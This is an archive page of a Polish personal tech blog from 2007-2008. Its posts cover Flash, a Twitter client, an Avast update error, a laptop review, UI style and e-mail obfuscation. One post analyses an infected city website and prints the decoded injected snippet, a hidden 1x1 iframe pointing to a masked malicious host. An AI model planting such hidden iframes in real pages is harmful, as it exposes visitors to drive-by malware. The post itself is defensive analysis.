Archive for Komputery
Adobe Flash otwarty
maj 2, 2008, godzina 13:37 · Komputery, Technologia »
Wczoraj świat obiegła straszliwa wiadomość, a echo jej dotarło do piekła, które od jakiegoś czasu powoli zamarza. Adobe zamierza opublikować specyfikacje formatu Flash (.swf i .flv). Straszliwa? Gdzie tam. Bardzo fajna. Bo nie dość specyfikacją mają zostać opublikowane, ale i zniesione restrykcje dotyczące tego formatu.
Kojarzy się to z inną, wcześniejszą akcją Adobe. Gdy PDF został otwarty i standaryzowany przez ISO stał się natychmiast czymś, co jest dla nas całkowicie naturalne. A mimo iż istnieją formaty konkurencyjne (DJVU czy XPS Microsoftu - ktoś o nim pamięta oprócz mnie?) to trzyma się świetnie, i pojawia wszędzie.
Czego Adobe szuka? Oficjalnie (za OsNews):
Projekt stopniowego uwalniania Flasha nazwano “Open Screen Project”. Razem z Adobe, współtworzą go takie firmy jak Intel, Cisco, Motorola, Nokia, LG, Samsung, BBC, NBC czy MTV Networks. Zadaniem projektu jest promowanie adaptacji technologii internetowych na szerokim spektrum urządzeń takich jak telefony komórkowe, telewizja, urządzenia przenośne i komputery biurkowe.
Nieoficjalnie mówi się, że to reakcja na Microsoft Silverlight, który ma otwartą specyfikację i niezależną (teoretycznie) otwartą implementację na inne platformy niż Windows (Moonlight).
Teraz każdy programista na świecie może sobie ściągnąć specyfikację i napisać odtwarzacz albo edytor plików Flasha. Także na nasze coraz powszechniejsze urządzenia mobilne, gdzie batalia dopiero się rozpocznie - choć Flash już tam jest, a Silverlight tak w sumie to niezbyt wiadomo jak się ma (trochę mi się z Yeti kojarzy - jest, ale nikt nie widział w akcji). Oprócz tego jeszcze Adobe wyszło ze swoim Fleksem do tworzenia tych tak zwanych Rich Internet Applications… I tak doszliśmy do kolejnej wojny.
Pozostaje pytanie jedno.
Co z tego wyniknie? Gnash posunie się w rozwoju o lata świetlne? Czeka nas era dominacji Flasha na urządzeniach mobilnych? Microsoft zostanie zepchnięty do defensywy na wielu frontach? Czas pokaże, jak zwykle.
A ja będę stał i przyglądał się z boku, bo jakoś tak szczególnie mi na Flashu nie zależy…
Permalink |
Witty
kwiecień 22, 2008, godzina 12:55 · Komputery, Programowanie »
Kiedy ostatnio wspomniałem o aplikacji o dźwięcznej nazwie Witty, która to jest klientem Twittera, pozwalającym na łatwiejsze śledzenie co też nasi znajomi wysyłają do tego serwisu, dla mnie - znacznie łatwiejsze niż z użyciem komunikatora czy strony internetowej, to martinez zwrócił uwagę w komentarzu, że aplikacja wprost idealnie wywraca się.
I taka też była prawda - Witty, wówczas w wersji 0.1.6 beta 2 wywracał się pięknie na każdym komputerze, który miał inne ustawienia regionalne niż en-US. Błąd ten sobie był zgłoszony nawet, a ja - dla siebie tylko - poprawiłem go (ale i informując autorów aplikacji co i gdzie należy poprawić). Zwolennicy ruchu Open Source tutaj się szeroko uśmiechnęli ;-)
Witty jest napisany w C# z użyciem technologii WPF (Windows Presentation Foundation), co oznacza, że akurat pasuje do moich zainteresowań. Szczerze mówiąc - znalazłem go przypadkiem, gdy chciałem poszukać jakiś bibliotek do obsługi Twittera by napisać samemu, bo poprzednio używany przeze mnie klient, Tweet-r, napisany dla platformy Adobe AIR, w ogóle nie zechciał działać po aktualizacji. Do dziś nie wiem dlaczego. Miał też kilka innych dziwactw, które za bardzo nie wiem z czym miały związek nawet - choćby otwieranie linków w Internet Explorerze, zamiast domyślnego dla mojego systemu Firefoksa.
Mniejsza o to. Witty 20 marca dorobił się wersji 0.1.7, która niestety nadal nie umiała działać na naszych systemach. Ściągnąłem całkiem niedawno bezpośrednio znów wersję z SVN, chcąc poprawić znów błąd i wypuścić program dla naszych użytkowników, ale spotkała mnie niespodzianka. W pobranej rewizji 199 błędu już nie było i program po kompilacji działał poprawnie. Do tego ta wersja udostępniała kilka nowych funkcji, takich jak klikalne “@imię”. Przed paroma minutami pobrałem z SVN rewizję 302, zmodyfikowałem w niej dosłownie jeden fragment kodu XAML, by uwidocznić w nagłówku, że nie jest to oficjalna wersja 0.1.7, a wersja “nightly” i skompilowałem - najpierw testując chwilę w trybie debug, potem do release.
I oto i on. Witty rev. 302.
Co ciekawego daje Witty oprócz przeglądania wpisów? Powiadomienia, szybką obsługę wiadomości bezpośrednich czy też przeglądanie globalnych odpowiedzi na nasze tweety.
Do pobrania archiwum ZIP (około 1 MB) jeżeli ktoś już teraz chciałby zacząć używać. Jeżeli ktoś jest programistą i ma dostęp na przykład do Visual C# 2008 Express - może samodzielnie pobrać wersję z SVN i skompilować. Instrukcje są do znalezienia na stronie programu.
Mam nadzieję, że programiści Wittiego się nie zmartwią, że udostępniam ich program ;-) Ale spodziewam się, że skoro jest to w SVN to program w wersji następnej będzie już działał jak trzeba oficjalnie.
Permalink |
Avast i jego błąd w setifaceUpdatePackages()
grudzień 23, 2007, godzina 15:09 · Komputery »
Jakieś dwa tygodnie temu antywirus Avast, którego używam na jednym z domowych komputerów, zaczął pokazywać błąd podczas aktualizacji. Takie czerwone okienko, które głosiło, że żeby dowiedzieć się więcej należy kliknąć. Po kliknięciu jednak nie działo się nic. Sprawę zostawiłem, aż mając wreszcie nadmiar wolnego czasu spojrzałem w czym może tkwić problem. Przy okazji też już Centrum Zabezpieczeń zaczęło się czepiać, że program może być nieaktualny.
Pierwszą rzecz o jakiej pomyślałem, to logi Avasta, które ten na szczęście posiada - a dostać się do nich można przez albo interfejs programu, albo przez systemowy Podgląd Zdarzeń (eventvwr.msc). W logach znalazłem następującą informację:
An error has occured while attempting to update. Please check the logs.
Po której następowało coś wreszcie mówiącego coś konkretnego:
Function setifaceUpdatePackages() has failed. Return code is 0×00000426, dwRes is 00000002.
Wpisałem do Google odpowiednie zapytanie i pierwsze co znalazłem to logi umieszczane na różnych forach internetowych do “obejrzenia” przez innych użytkowników, a pierwsze co było konkretne to strona Avasta… po koreańsku. Wyszukiwanie zatem powtórzyłem na forum dyskusyjnym Avasta, które najwyraźniej nie jest zindeksowane przez Google, i znalazłem tam olbrzymią liczbę wątków o tym traktujących.
Ów błąd może pojawić się w sytuacji, gdy plik Setup\servers.def w katalogu programu ma rozmiar 0 bajtów albo jest uszkodzony i można wtedy pobrać nowy plik. U mnie jednak tutaj było dobrze. Problem mógł też być z biblioteką setiface.dll, która mogła być uszkodzona, co należało poprawić przez zmianę nazwy pliku setiface.ovr na setiface.dll (ciągle w podkatalogu Setup). U mnie jednak obydwa te pliki były identyczne. Firewall ani ustawienia proxy także nie mówiły, by było coś źle. Firewall po prostu - po wybraniu aktualizacji nawet nie pytał czy Avast ma uzyskać dostęp do sieci.
Zwracany kod 426h, czyli 1062 w systemie dziesiętnym, to jak twierdzi net helpmsg 1062 “The service has not been started.”. Ale niezbyt wiele mi to pomogło. I pomogło w końcu to, co przeczytałem i wcześniej.
download the latest avast installation package from http://www.avast.com/iavs4pro/setupeng.exe (I hope you’re using the English version of avast) and run it on the machine.
That will repair the installation and also update it to the latest version for you.
Działa. Mogłem to zrobić wcześniej, prawda? Po prostu reinstalka programu… Ech.
Technorati Tags: Avast, update error, setifaceUpdatePackages, 0×00000426
Permalink |
Rok z nx7400
grudzień 12, 2007, godzina 18:30 · Komputery »
Jakoś tak rocznicowo się zrobiło. Ledwo niedawno minął mój pierwszy tydzień używania odtwarzacza Zune, ledwo zdałem sobie sprawę, że już w sumie od 12 lat mam do czynienia z komputerem, gdy znaleziona przypadkowo faktura uświadomiła, że od roku jestem posiadaczem laptopa.
Odkąd byłem mały zawsze chciałem mieć laptopa. W sumie - to dokładnie nie wiem czemu, bo i tak dużą większość czasu stoi on w jednym miejscu i jest maszyną stacjonarną. Niemniej jednak czasem przydaje się zabrać ze sobą gdzieś sprzęt, więc mobilność jest istotna.
Jestem posiadaczem HP Compaq nx7400, model EY508ES. Wyposażony w procesor Core Duo T2250 o częstotliwości 1,73 GHz, 1 GB RAM, układ graficzny Intel GMA 950 i 80 GB twardego dysku.
Gdy komputer kupiłem, miał on Windows XP Home Edition, preinstalowany. Który jednak już pierwszego dnia znalazł się (cały, cała partycja ukryta) na dwóch płytach DVD, a jego miejsce zajął inny system. Microsoft Windows Vista, w wersji najpierw RC2, od marca jako Windows Vista Business N w wersji już finalnej.
Wrażenia z używania? Jak najbardziej pozytywne. Obecnie da się już zobaczyć, w które klawisze najczęściej uderzam, bądź też gdzie mam nadgarstek, jednak plastyk w tych miejscach jest bardziej “błyszczący”, na szczęście nie jest wytarty. Byłem wrogiem błyszczących matryc, do której się jednak przyzwyczaiłem, nadal jednak w jasnym otoczeniu bez podświetlenia (na minimalnym, jak w trybie oszczędzania baterii) prawie nie da się pracować (i strasznie widać kurz, którego mam jakoś dużo). Bateria nie jest wynalazkiem super znakomitym, wytrzymuje około dwóch godzin z hakiem. Czasem “hak” osiąga nawet godzinę, czasem ledwo kilka minut, zależy od obciążenia. Komputer się nie “grzeje” tak bardzo, da się pracować nawet z nim na kolanach (podobno jednak to niezdrowe), bardzo fajnym pomysłem jest przycisk wyłączenia Wi-Fi i Bluetooth, jednak dioda sygnalizująca łączność bezprzewodową jest niebieska i bardzo jasna. Świetne są też sprzętowe przyciski regulacji głośności oraz takie drobne pomysły jak gniazdo słuchawkowe jednak nie z przodu urządzenia, a z prawej strony ;-) No i rzecz jasna układ klawiatury z prawie normalnym układem klawiszy Home/End, Delete/Insert itp.
Jednak trzy gniazda USB to czasem za mało, ale moje lenistwo ciągle nie pozwala mi kupić huba USB. Denerwujące jest to, że czasem matryca nie chce “wstać” po obudzeniu komputera ze stanu uśpienia (ruchem myszy, klawiszem działa). Miałem też problemy ze “znikaniem” napędu DVD, które jednak przestały ostatnio się pojawiać (raz - bo rzadziej korzystam, dwa - chyba jakaś poprawka to naprawiła wreszcie).
Dotychczas, jako posiadacz maszyny stacjonarnej, mogłem ją nieco łatwiej ulepszać. Tutaj jedynym krokiem nad którym się zastanawiam i który mogę bezproblemowo zrealizować jest dodanie pamięci RAM, może do 1,5 GB. Mała stosunkowo pojemność twardego dysku została zrekompensowana przez dodatkowy dysk w kieszeni na USB, a moje niedostosowanie do touchpada rekompensuję moją bezprzewodową myszką. Czasem jednak siadam do touchpada i mam wtedy wielką wdzięczność za zrobienie czegoś w rodzaju “scrolla” myszki i wielki żal za brak środkowego kliknięcia.
Moja maszyna już kilka miesięcy po zakupie doczekała się następcy, modelu nx7300, który jest bardzo podobny - dziś są jednak już wersje z Core 2 Duo oraz Intelem GMA X3100. Słaba wydajność karty graficznej i jej… powiedzmy egzotyka, trochę przeszkadzają, jednak ja znów nie gram w tak wiele gier, wydajność procesora nie jest dla mnie sprawą pierwszorzędną.
A pamiętam gdy tuż po zakupie wydawał mi się bezgłośny. Dziś jednak już słyszę wentylator, nawet przy spokojnej pracy, bo przy obciążeniu się rozkręca do bardziej słyszalnych obrotów.
Technorati Tags: HP Compaq nx7400, laptop
Permalink |
C lat z komputerem
listopad 27, 2007, godzina 20:05 · Komputery, Prywatne »
Dzisiaj chyba, o ile dobrze pamiętam, albo w piątek, mija już 000Ch lat odkąd mam w domu komputer. Sporo, zważając na to, że sam mam ledwo lat tyle samo (w zapisie dziesiętnym), ale z odwróconymi cyframi - czyli 21.
Kiedyś już nawet pisałem jak wyglądała moja droga związana z programowaniem, ale teraz zacząłem się zastanawiać jak wyglądała moja droga od strony użytkownika. W tym i gracza, bo co by tu ukrywać - dzieckiem będąc to się grało.
Zaczynałem od komputera z procesorem AMD 486 DX4 100 MHz, który według przeprowadzanych testów dorównywał wydajnością Pentium 60, co we mnie wzbudzało wielką radość - nawet gdy kolega miał już Pentium 100. Moje 8 MB RAM było nadmierną ilością, która potem okazała się bardzo istotna. Karta dźwiękowa będąca klonem Gravis UltraSound miała sprzętowy WaveTable - dziś to niewiele znaczy, w owym czasie to także mnie podbudowywało ;-) CD-ROM o zabójczej szybkości 2x… A na komputerze miałem niesamowity system operacyjny MS-DOS 6.22. Do dziś mam podręcznik z niego, oryginalne dyskietki instalacyjne oraz certyfikat autentyczności. To był koniec listopada 1995 roku. Do komputera dostałem płytę z grami - w wersjach demo/shareware, głównie produkcji Apogee. Tak, Jazz Jackrabbit, Raptor i tym podobne produkcje.
Potem w jakiś sposób zdobyłem Windows 3.11 for Workgroups (instalowany z dyskietek o ile pamiętam, ale skąd i jak zdobyty - nie pomnę). W grudniu tego roku pod choinkę dostałem zestaw gier “Comanche vs. Werewolf” produkcji NovaLogic, na płytach CD, które miały jeden feler - na tym 2x napędzie CD-ROM wczytywanie misji trwało godzinami. O ile pamiętam to jak zobaczyłem te same gry na 6x napędzie CD to było to piękne! Potem doszły też takie gry jak “The Lion King”, “Wolfenstein 3D”, “Doom” i inne. W większości nadal jakieś wersje shareware czy tym podobne. Pamiętam też dobrze Norton Commander 4.0. Windows 95 na tym komputerze znalazł się dzięki także uprzejmości czyjejś (nie pamiętam już kogo), przegrywany był kablem null-modem dzięki NC 5.0. Trwało to naprawdę długi czas… Jakoś też wtedy miałem Lotusowy Word Pro ‘97 (dołączony do drukarki chyba), skądś (o rany, ale wtedy nie było chyba nawet pojęcia piractwa komputerowego) Worda 6.0… z którego pamiętam jedną “Poradę dnia”: “Łatwo się skaleczysz, jeżeli będziesz biegał wymachując siekierą”. Potem pamiętam też jak załamałem się gdy zakupiona (za zawrotną sumę 169,- PLN) gra Jane’s USNF ‘97 nie chciała działać, na co receptą było dwukrotne zwiększenie ilości RAM.
Z 486 po 5 latach przesiadłem się na sprzęt klasy znacznie wyższej - i współcześniejszej. Na Celerona 633 ze 128 MB RAM, dyskiem 17 GB zamiast 630 MB starego komputera i Rivą TNT2. Potem także na nowy monitor 17″ zastępujący wysłużony 14″ Daewoo. No i rzecz jasna na Windows 98. Ale tutaj w ogóle nie pamiętam w co ja mogłem grać. Na pewno nie w te starocie z 486 (chyba niektóre gdzieś mam), ale nie pamiętam. Jedyne co dobrze pamiętam to programowanie w QBASIC-u (zaczęte już na tym nieszczęsnym 486). Potem po 3 latach przesiadłem się na Athlona 2400+ z 512 MB RAM i dyskiem 80 GB, co już było kompletnym skokiem technologicznym. I tenże komputer chodzi u mnie do dziś (i bardzo dobrze się ma). I pod koniec zeszłego roku przesiadłem się znów - na laptopa (zawsze chciałem mieć!) Core Duo 1,73 GHz z 1 GB RAM… na którym gram bardzo, bardzo rzadko (Starcraft, Gunmetal ostatnio i takie głupoty).
I dzisiaj jestem posiadaczem w domu 3 działających komputerów, jednego prawie i części pozwalających na zbudowanie jeszcze kilku, znam więcej języków programowania niż języków obcych, noszę grube okulary, mam palmtopa, switch, router i marzę o “inteligentnym domu”. Co to się przez 12 lat zrobiło?!
Tak sobie właśnie pomyślałem, że do tych podsumowań należy dodać jeszcze jedno - dostęp do Internetu mam od okolic tego 2003 roku, najpierw modem (V.90), potem, po dłuższym czasie, 128 Kb/s łącze, dziś już 3 Mb/s. Windows widziałem wszystkie na oczy (długo używałem 95, 98 i ME) z wyjątkiem NT < 5.0 (XP używam od 4 lat, Visty od roku), Linuksa pierwszy raz na oczy zobaczyłem w postaci SUSE 5.3, a potem Mandrake 6.1.
Ale mi się na wspomnienia zebrało.
Permalink |
Styl aplikacji
listopad 17, 2007, godzina 14:58 · Komputery »
Ogólnie rzecz biorąc lubię mieć, w swoim systemie operacyjnym, wszystko w jednym stylu. Wszystkie aplikacje wyglądające podobnie i korzystające z jednakowych kontrolek. Z tego też powodu na przykład do gustu bardzo mi nie przypadła przeglądarka Safari pod Windows, która wygląda jak wzięta z MacOSX (czy też iTunes tego samego producenta). Nie lubię też małych aplikacyjek, które wyglądają inaczej niż reszta. Nawet za motywami wyglądu w mojej przeglądarce internetowej nie przepadam i używam standardowego, który jest w miarę zgodny z systemem. Tak, jestem konserwatywny.
Wczoraj zainstalowałem Zune, Microsoftowy program do obsługi odtwarzacza o tejze nazwie, ale ogólnie - także do zarządzania muzyką, filmami, zdjęciami. I muszę przyznać - jest całkiem ładny. Ale w ogóle do niczego innego, co mam w systemie niepodobny!
Tak samo nie podobał mi się instalator aplikacji AIR (który wykorzystuje własne kontrolki), choć aplikacja oparta o AIR, którą używam, Tweetr, jest całkiem ładna. I nawet się jako tako z systemem zgrywa, ale chyba tylko przypadkiem, że i domyślny styl Visty jest dość ciemny.
Jednak najgorzej jest, gdy jest program portowany z innej platformy. Wspomniałem już o Safari i iTunes, które mi pod Windows w ogóle nie pasują i wyglądają jakoś tak dziwnie… swoją drogą ogólnie styl Aqua średnio mi się podoba, ale to inna sprawa. Jednak używam także kilku aplikacji używających różnych wieloplatformowych toolkitów - Psi opartego o QT, który do stylu systemu się w miarę ładnie dostosowuje, oraz GnuPG Privacy Assistant, używający GTK+.
I moim zdaniem to nie tylko ten program wygląda okropnie (trochę jak z ubiegłej epoki) brzydko, to jeszcze z moim systemem wizualnie nie ma już zupełnie nic wspólnego!
Drodzy programiści. Jeżeli chcecie robić skórki - super, bo ktoś sobie będzie mógł dostosować aplikację do potrzeb. Ale - naprawdę nie próbujcie udziwniać aplikacji. To nie jest fajne, gdy każdy program wygląda inaczej. I tak chociaż o tyle dobrze, że w większości się trzymacie pewnych wspólnych zasad (UI Guidelines)…
Technorati Tags: Safari, Zune, iTunes, GTK, UX, UI
Permalink |
Koń trojański atakuje!
listopad 1, 2007, godzina 19:18 · Komputery »
… Mac OS X. Napisali tak na portalu DobreProgramy i rzecz jasna pojawiła się tona znów ludzi mówiących na zmianę, że system producenta z Redmond jest lepszy i żeby się zarazić wirusem trzeba być głupim i zgraja użytkowników jednego z systemów alternatywnych którzy mówią, że ich rozwiązanie jest bezpieczniejsze. Rozbrajają mnie komentarze, zresztą takie dyskusje są prawie pod każdym newsem na tym portalu, ale już się przyzwyczaiłem.
To prawda, czasem się we mnie krew gotuje, gdy ktoś pisze oczywiste bzdury, ale i tak nauczyłem się po prostu komentarze na takich portalach czytać, pomijać i pisać cokolwiek tylko w bardzo, bardzo rzadkich przypadkach. A swoją drogą to na DP.pl używam nicka “Nemhein”, jakiś “ktosiów” tam jest od groma, nawet na podobnych systemach/przeglądarkach.
Jednak ów koń trojański występuje w postaci obrazu DMG i użytkownik musi go zainstalować samemu. Wynika z tego wyraźnie, że to od użytkownika zależy, czy do jego systemu dostanie się niebezpieczna aplikacja - a sama architektura MacOS X, jako pochodna Uniksa, wspomaga użytkownika dzięki temu, że domyślnie się na koncie roota nie pracuje. Tak przynajmniej głosi rozsądek i takie są zalecenia. Stąd program sam namieszać nie może, i to użytkownik musi mu zezwolić. Windows - standardowo jak wiadomo - ma tutaj znacznie gorsze podejście (do Visty rzecz jasna - może i te popierdółki “Czy chcesz zezwolić?” są za częste i wkurzające, ale naprawdę są ważne!).
Teraz powstaje pytanie - czy zatem pod Linuksem nie można by zastosować identycznego manewru? Gdy pobieramy kod źródłowy aplikacji i wykonujemy te magiczne ./configure, make, sudo make install, to co stoi na przeszkodzie, by w trakcie wykonywania make install (które zwykle wykonuje się jednak na prawach roota) wykonać “dodatkowo” jakiś złośliwy kod? Co stoi na przeszkodzie, by to samo zrobić przy instalacji paczki .rpm czy .deb? Może ja o czymś nie wiem?
Powiecie, że jeżeli pobieramy kod źródłowy i go ręcznie kompilujemy to wiemy dokładnie co robimy. No okej, może i tak. Ale ja tego kodu nie przeglądam. A jeżeli ktoś by się włamał na serwer producenta i dał kod nieco zmodyfikowany (WordPress miał coś w tym stylu)? Ilu z nas sprawdza przed kompilacją cały kod źródłowy, ile osób go nawet przegląda? A paczki, gdy są do pobrania?
Powiecie zatem, że nikt nie instaluje paczek ze strony, tylko pobiera z repozytoriów. A co, jeżeli danej aplikacji nie ma repozytorium, wydaje się ciekawa, a w rzeczywistości to nawet nie istnieje, a jest tylko przynętą do zainstalowania konia trojańskiego? Sytuacja hipotetyczna, ale możliwa.
Narzekanie na Vistę to jakoś ostatnio jest w modzie. A ja dzisiaj powiem rzecz taką - oprócz tego, że jest UAC, który uważam za świetne rozwiązanie (to, jak wyglądała praca z uprawnieniami obniżonymi w XP, to nie było tak przyjemne miejscami), to nawet głupie poprawienie autoruna, w ten sposób że i tak system się pyta czy uruchomić autorun.inf, jest podyktowane względami bezpieczeństwa (i dla mnie jest wygodne, bo częściej otwieram folder płyty CD niż uruchamiam startujące z niej aplikacje). Włożyłem pendrive’a mojego, który wcześniej przebywał w pewnym komputerze. A tu system się mnie pyta, czy uruchomić aplikację copy.exe jak nakazuje mu autorun.inf. “WTF?”. Otwieram folder, a na nim znajduje się parę plików ewidentnie do jakiegoś wirusa należących…
A, jeszcze mała dygresja odnośnie MacOS X, a dokładnie jego najnowszej edycji, “Leoparda”. Wiecie, że wprowadza ponad 300 ulepszeń w tym tak rewolucyjne jak cień pod aktualnie aktywnym oknem. Są jednak i nowości w kwestii bezpieczeństwa - między innymi do plików pobieranych z Internetu dodaje specjalny tag, który przy próbie ich otwarcia powoduje wyświetlenie ostrzeżenia.
Tagging Downloaded Applications
Protect yourself from potential threats. Any application downloaded to your Mac is tagged. Before it runs for the first time, the system asks for your consent — telling you when it was downloaded, what application was used to download it, and, if applicable, what URL it came from.
http://www.apple.com/macosx/features/300.html#security
Kto z was uważa to rozwiązanie za nowatorskie, rewolucyjne i znakomite? Czy ono jakkolwiek może pomóc?
Technorati Tags: MacOS X, Leopard, Linux, Windows, security, trojan horse
Permalink |
Zakoduj swój e-mail?
wrzesień 18, 2007, godzina 15:58 · Komputery, Programowanie, Webmastering »
Obroną przed grasującymi po Sieci robotami, które automatycznie zbierają adresy e-mail jakie znajdą, by dołączyć do spamerskich baz danych może być - według wielu osób - różnorakie kodowanie adresu e-mail.
Jednak niestety - tak w gruncie rzeczy to większość z popularnych w internecie metod jest w gruncie rzeczy nie warta nic. Albo bardzo niewiele. Ot choćby takie coś jak popularna zamiana znaku “@” na “(at)” czy inne “[at]”. Co stoi na przeszkodzie by w spamerskim bocie po pobraniu tekstu strony zmieniać wszystkie “(at)”, “[at]” czy inne, nawet takie jak moje “(na)” po prostu na “@”? Nic nie stoi na przeszkodzie. Tak samo nic nie stoi na przeszkodzie by zamieniać znak @ czyli właśnie “@” w innym zapisie.
Niektórzy zatem tworzą bardziej skomplikowane rozwiązania kodujące adres e-mail. Oprócz zamiany samego “@” na ciąg postaci &#xx; zamieniane są wszystkie znaki w adresie. Przeglądarka wyświetla to jak trzeba, w źródle strony będzie nieczytelne. Albo dodają do adresu nadmiarowe rzeczy w rodzaju USUNTO (spam@example.com.usunto), które raczej zauważy i usunie tylko człowiek, a nie robot. Im bardziej niekonwencjonalne rozwiązanie, tym bardziej skuteczne. Te popularniejsze już przecież musiały zostać przez spamerów zauważone, prawda? Dlatego szczerze wątpię w skuteczność zamian na encje.
Niezłe jest wykorzystanie obrazka z adresem. Jednak należy wystrzegać się takich sytuacji, gdy adres e-mail jest umieszczony w obrazku (i nie do odczytania przez normalne roboty), ale adres np. komunikatora GTalk (taki sam jak e-mail) już nie jest w żaden sposób “ukryty”. Oczywiście obrazek ma też tą wadę, że jest nie do przeczytania przez osoby niewidome czy używające przeglądarek tekstowych.
I są w końcu skrypty JavaScript. Jedni stosują wymyślne podstawianie i zmiany w tekście w drzewie DOM, inni po prostu wpisują tekst na stronę używając document.write(). Jednak tak naprawdę, czy te rozwiązania są skuteczne? Przeglądarka internetowa obsługująca JavaScript wyświetla adres już na przykład w formie zdekodowanej. Zatem czy coś stoi na przeszkodzie, by stworzyć robota zbierającego adresy obsługującego JS? Albo może nawet zapytam inaczej - czy jest jakikolwiek sens tworzyć takiego robota, skoro mamy już gotowe mechanizmy do wykorzystania - właśnie silniki przeglądarek internetowych! Jakiś czas temu w ramach nauki C# stworzyłem taki program - wykorzystując kontrolkę WebBrowser potrafi ominąć większość “zabezpieczeń” adresu e-mail jakie są stosowane, bo nie operuje na normalnym źródle strony, a na tekście już “przetrawionym” przez JavaScript.
Jednak tworząc ten program (i szukając różnych metod ukrycia adresu) znalazłem zabezpieczenie, które będzie bardzo trudne do ominięcia. Wystarczy stworzyć odnośnik, do którego zdarzenia onclick będzie podpinana funkcja, która naszą przeglądarkę na właściwe źródło nakieruje. Wydaje się proste. Należy jednak pamiętać, by podmieniając adres nie napisać go gdzieś w źródle w postaci jawnej (np. var newmail = mailto:dobry@example.com), a składać go na przykład z kilku zmiennych. Dlaczego? By ustrzec się z kolei przed robotami operującymi na źródle, które z pewnością taki ładny link by zauważyły, nawet poza znacznikiem <a>.
A może są jakieś inne metody, dobre i naprawdę skuteczne, a ja o czymś nie wiem?
Technorati Tags: javascript, spam, antispam, harvester
Permalink |
Wirus prezydencki
wrzesień 16, 2007, godzina 08:47 · Internet, Komputery »
Dziś rano czytając RSS jakie mam w Google Readerze moją uwagę przykuł tekst na blogu Tomka Topy: “Strona Prezydenta Gdańska może wyrządzić szkody na Twoim komputerze…”. Tomek pisze, że tak Google pisze przy wyszukiwaniu i tak twierdzi jego antywirus AVG po zapisaniu strony na dysk.
Tak się jakoś złożyło, że ostatnio piszę sporo na temat bezpieczeństwa, więc i tym mogłem się zająć. Korzystając z mojej niewielkiej wiedzy na temat JavaScriptu sięgnąłem do źródła owej niebezpiecznej witryny i ujrzałem tam fragment kodu JavaScript, wspólny dla praktycznie wszelkiego typu złośliwych witryn - zakodowany tekst, rozkodowywany przez skrypt i wprowadzany do kodu strony poprzez document.write. Dlaczego zakodowany? Aby żaden antywirus nie zobaczył tego “na pierwszy rzut oka” oraz żeby żaden człowiek nie zobaczył tego na pierwszy rzut oka. Chwilka zabawy z trzema skryptami JS umieszczonymi na witrynie ujawniła co tak naprawdę do kodu strony wstrzykują.
<div style="visibility:hidden">
<iframe src="http://*****.com/**/upl/"
width=1 height=1></iframe></div>
Te trzy kawałki kodu różniły się tylko adresami w tych <iframe></iframe>. Co znajdowało się pod nimi? Niestety tego nie wiemy i być może się już nie dowiemy, bo dwa już nie mogą zostać znalezione, a jeden serwuje nam błąd 404. Spodziewam się, że tam znajdowały się jakieś niebezpieczne kody, być może jakieś trojany atakujące czy to Internet Explorera czy Firefoksa, jak pokazywał ten Łańcuszkowy atak na Gadu-Gadu sprzed blisko roku.
Strona zatem już niebezpieczna nie jest.
Pozostaje pytanie jednak - skąd niby niebezpieczny kod miał się wziąć na stronie prezydenta Gdańska? O uszy obiło mi się jakiś czas temu, że istnieje wirus/trojan/robak (dziś już coraz trudniej chyba określić co jest co), który korzystając z zapisanych haseł o FTP w programie Total Commander na komputerze ofiary łączy się z owymi serwerami FTP, a następnie modyfikuje pliki index.html czy index.php dodając do nich właśnie niebezpieczny kod - prowadzący choćby do strony przez którą taki wirus atakuje. Niestety nic na ten temat nie mogę wygooglać - jedyne co znalazłem na razie to informacje na temat trojanów z rodziny Trojan-PSW.Win32.PdPinch i Trojan-PSW.Win32.LdPinch których zachowanie jest o tyle podobne, że też “kradną” dane do łączenia się m.in. z serwerami FTP z użyciem programów Total Commander czy FileZilla.
Znalazłem. Zenux robi coś w tym stylu, może to jakaś jego odmiana.
Obrona? Nie zachowywać haseł w programach.
Permalink |
Adobe AIR
sierpień 13, 2007, godzina 09:20 · Komputery, Programowanie, Technologia »
Obiecałem, że napiszę kilka słów, czego mi brakuje w Adobe AIR, w jego obecnej fazie, bo jest to - jak wiele rzeczy w dzisiejszych czasach - wersja beta. Nie byłem przekonany do tego pomysłu, bo za Flashem nie przepadam (od strony użytkownika, od strony programistycznej to nie widziałem nigdy), ale zacząłem używać dwóch aplikacji napisanych dla “Apollo”, tj. AIR i sprawują się całkiem nieźle i nawet nie są - wbrew moim obawom - wolne.
Jednak cudo to nie jest. Przynajmniej na razie ma parę rzeczy, które mnie denerwują zwyczajnie. Przede wszystkim - respektowanie domyślnej przeglądarki internetowej. W moim systemie jest to Mozilla Firefox - Internet Explorer służy tylko do otwierania plików .mht czy .mhtml (oraz .xml bo ma lepszy sposób pokazywania plików XML bez ostylowania). Jednak programy napisane pod AIR usilnie otwierają wszystkie linki w Internet Explorerze, bo dla Adobe to jest domyślna przeglądarka w systemach z rodziny Windows (o ile dobrze pamiętam jakieś FAQ). Co z tego, że mogę szybko przejść do linków, jakie moi znajomi wysyłają na Twittera (którego używam namiętnie przez Tweet-r) czy Pownce, skoro otwierają się nie tak jak powinny?
Po drugie brakuje mi jakiegoś menedżera do zainstalowanych aplikacji. Gdy usunę skróty z Menu Start to gdybym nie wiedział, gdzie te aplikacje się znajdują, to bym nie uruchomił już. Swoją drogą też znajdują się w dziwnym miejscu (C:UsersMarcinAppDataLocal miejscem na aplikacje?), co jednak wymuszone jest tym, że mogą się zainstalować także bez uprawnień dostępu do Program Files, więc rozumiem dlaczego.
Nie pasuje oczywiście też to, że przyciski np. instalatora AIR (jak i cały styl tej aplikacji) nie są zgodne ze stylem systemu, a są “własne”. Może i ładniejsze, nie wiem, w każdym razie - inne.
Ciekawi mnie jednak czy i jak się to przyjmie…
Permalink |
« Poprzednia strona
